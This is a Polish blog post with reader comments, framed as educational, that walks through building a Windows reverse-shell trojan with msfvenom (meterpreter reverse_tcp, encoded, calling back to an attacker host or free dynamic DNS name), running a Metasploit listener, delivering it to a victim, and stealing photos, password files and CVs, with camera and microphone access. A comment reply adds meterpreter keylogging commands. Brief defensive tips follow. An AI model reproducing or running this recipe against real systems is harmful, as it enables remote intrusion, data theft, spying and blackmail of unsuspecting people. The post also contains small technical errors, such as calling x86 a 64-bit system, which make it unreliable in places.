Włamanie na system operacyjny. [wideo] Jak ustrzec się przed crackerem?

W tym artykule pokaże, w jaki sposób crackerzy mogą wykraść z komputera ofiary takie dane jak zdjęcia, hasła, poufne informacje. Tekst jak i film mają charakter edukacyjny. Powtarzając te czynności robisz to na własną odpowiedzialność.
Wszelkie działania robiłem na własnym komputerze.
Pierwszą rzeczą jaką robi atakujący jest stworzenie wirusa (exploita).
Tutaj pokazany będzie najprostszy sposób, przy użyciu programu metasploit framework. 

Co będzie potrzebne:
– Linux (używałem Linux Mint 19 Cinnamon)
– Metasploit Framework

Tworzymy exploita, w terminalu wpisujemy polecenie:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=NaszIP/host lport=4444 -b "\x00" -e shikata_ga_nai -f exe -0 /home/nazwa_użytkownika/Pulpit/

Opis:
-a x86 -architektura systemu ofiary (x86 to 64 bitowy system operacyjny)
–platform windows – chyba oczywiste
-p windows/meterpreter/reverse_tcp -payload, czyli ładunek naszego wirusa (tutaj odwrócone połączenie TCP.
-lhost – nasz adres IP, można użyć również domeny (tak jak to pokazałem w filmie). Darmowego hosta można uzyskać na noip.com.
-port – port, na którym będzie dział nasz wirus
-b – unikanie niektórych znaków w ładunku
-e  shikata_ga_nai – koder do zakodowania naszego wirusa
-f – w jakim formacie ma być wygenerowany exploit
-o – miejsce, w którym zostanie zapisany

Teraz należy uruchomić konsolę metasploita i stworzyć nasłuch, wcześniej przygotowanego złośliwego oprogramowania.

Start konsoli:
msfconsole
Moduł do nasłuchu:
use exploit/multi/handler
Ładunek wirusa do nasłuchu:
set payload windows/meterpreter/reverse_tcp
IP/host atakującego:
set lhost nasze IP/host
Port do nasłuchu:
set lport 4444
Uruchomienie nasłuchu:
exploit

Teraz pozostaje dostarczenie „ofierze”, przygotowanego na początku exploita.
Jeżeli wirus zostanie uruchomiony, otworzy się sesja meterpretera.

Aby wyświetlić wszystkie dostępne polecenia należy wpisać „?”.
Atakujący ma praktycznie dostęp do całego systemu. Może tworzyć pliki/foldery, pobierać i wysyłać pliki (w tym zdjęcia i dokumenty).
Ponadto może uruchomić kamerę i mikrofon.

Jak przebiegał cały atak można zobaczyć w filmie.

Teraz czas na informacje jak ludzie najczęściej „łapią” takie wirusy.
Zdecydowanie przoduje tutaj pirackie oprogramowanie. Wiele z nich ma cracki, bądź keygeny, które sprawiają, że dany program, lub gra działają. Zazwyczaj mają doklejony złośliwy kod, czyli są końmi trojańskimi. Łatwo też zarazić się pobierając programy, nawet te legalne z nieoficjalnych stron.  Cyberprzestępcy stosują również inne metody, takie jak phishing czy spoofing (to już temat na osobny artykuł).
Tekst przedstawia jak wygenerować exploita w formacie exe, jest ich znaczniej więcej, złośliwy kod można umieścić nawet w PDF-ie.

Jak unikać zagrożenia, jak się chronić?

  • Nie korzystać z pirackiego oprogramowania. Jeżeli nie ma się kasy na zakup legalnego softu, można skorzystać z bezpłatnych zamienników.
  • W przypadku starszych systemów, takich jak Windows 7, koniecznie zainstalować program antywirusowy. Wystarczy darmowy Avast…
  • Uważać na linki, czy programy, które dostajemy od znajomych. Jeżeli nie mamy pewności co to jest, najlepiej zignorować i nie otwierać.

Po co ktoś to robi??

Cyberprzestępcy nie robią takich rzeczy po to, aby komuś złośliwie zniszczyć system. W ich interesie leży, aby ofiara nie zorientowała się, że coś jest nie tak z ich komputerem. Dzięki temu mogą zdobyć dane, które służą później do rozmaitych rzeczy. Przykładowo szantaż. W filmie i na zrzutach ekranu widać, jak pobiera się zdjęcia z wakacji. Niby nic, jednak dzięki temu atakujący może się dowiedzieć, gdzie lubimy spędzać czas, może to posłużyć później do różnego rodzaju socjotechnik, dzięki którym będzie mógł zebrać kolejne informacje, lub podając się za biuro podróży wyłudzić pieniądze (temat na osobny artykuł).
Kolejny pobrany plik hasla.txt. Jedna z najgłupszych form przechowywania haseł, jednak wiem, że ludzie tak niestety czasami robią… Jak widać są tam dane, do bankowości (oczywiście fałszywe…), pieniędzy co prawda nie stracimy w ten sposób. Jednak gdy atakujący zaloguje się przez internet do naszego banku, będzie miał dostęp do wrażliwych danych, takich jak adres, PESEL(!), numer telefonu.

Wykradzione zostaje również nasze CV (Moje CV.pdf). Jak widać atakujący ma przez to dostęp do danych, takich jak adres zamieszkania, numer telefonu i historia zatrudnienia.  Podszycie się pod Janusza, z którym się pracowało X lat temu, nie będzie stanowiło problemu. Dzięki socjotechnice, może również próbować wyłudzić pieniądze, w postaci pożyczki. No co? Staremu kumplowi nie pożyczysz? 😉

Komputer dziwnie się zachowuje, co robić?

Niekoniecznie musi to być atak crackera, być może system jest po prostu zaśmiecony. Jednak, gdy byliśmy na różnych hmm podejrzanych stronach, bądź instalowaliśmy jakieś nie do końca legalne oprogramowanie lepiej użyć skanera antywirusowego. Polecam Malwarebytes.

To wszystko, mam nadzieję, że dzięki podstawowej wiedzy jak działa exploit, czyli złośliwe oprogramowanie, oraz wskazówkom jak uniknąć zarażenia będziecie bardziej uważni, przy korzystaniu z internetu. Pozdrawiam.

Podziękowania dla Krysi Potaczek za pomoc w zdalnych testach.

Udostępnij:

2 Replies to “Włamanie na system operacyjny. [wideo] Jak ustrzec się przed crackerem?”

  1. Fajny poradnik, jednak badzmy szczerzy, kto trzyma swoje hasla, pesel itp. w pliku na kompie. Pewnie są takie osoby ale żeby znaleźć 1 taką osobę haker musiałby sprawdzić nw. 100 (?) takich ofiar. Czekam na poradnik z jakimś keygenem 🙂

    1. Wbrew pozorom dużo osób trzyma takie dane w plikach. Przykładowo faktury, gdzie często jest pełen adres. Tak jak w artykule napisałem zwykłe CV… Ile danych można z niego uzyskać. Choćby sam adres zamieszkania i adres email. Mając takie informacje, można uwiarygodnić się w oczach ofiary, że ma się więcej np. nagie zdjęcia z kamery, zapisane rozmowy itp. To już przykład socjotechnik. Napiszę o tym w późniejszym czasie. Co do keyloggera, to osobny poradnik nie ma sensu, w otwartej sesji meterpretera wystarczy polecenie keyscan_start, a później keyscan_dump – odczytanie.

Dodaj komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *